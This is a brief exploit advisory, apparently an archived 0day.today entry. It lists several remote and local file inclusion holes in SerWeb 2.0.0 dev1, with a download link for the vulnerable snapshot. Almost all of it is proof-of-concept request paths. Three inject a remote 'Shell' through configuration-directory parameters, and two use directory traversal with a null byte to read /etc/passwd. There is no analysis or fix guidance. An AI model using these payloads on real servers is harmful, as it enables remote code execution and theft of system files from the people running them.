id: 2342
date: 12/06/2007
title: SerWeb <= 2.0.0 dev1 2007-02-20 Multiple RFI / LFI Vulnerabilities
author: GoLd_M
cves: 

==================================================================
SerWeb <= 2.0.0 dev1 2007-02-20 Multiple RFI / LFI Vulnerabilities
==================================================================



SerWeb <= 2.0.0 dev1 2007-02-20 Multiple RFI / LFI Vulnerabilities
D.Script : http://ftp.iptel.org/pub/serweb/daily-snapshots/serweb-2.0.0-dev1_2007-02-20.tar.gz
POC:
    /load_lang.php?_SERWEB[configdir]=Shell
    /main_prepend.php?_SERWEB[functionsdir]=Shell
    /load_phplib.php?_PHPLIB[libdir]=Shell
    /js/get_js.php?mod=../../../../../../../etc/passwd%00
    /js/get_js.php?js=../../../../../../../etc/passwd%00



#  0day.today [2023-03-26]  #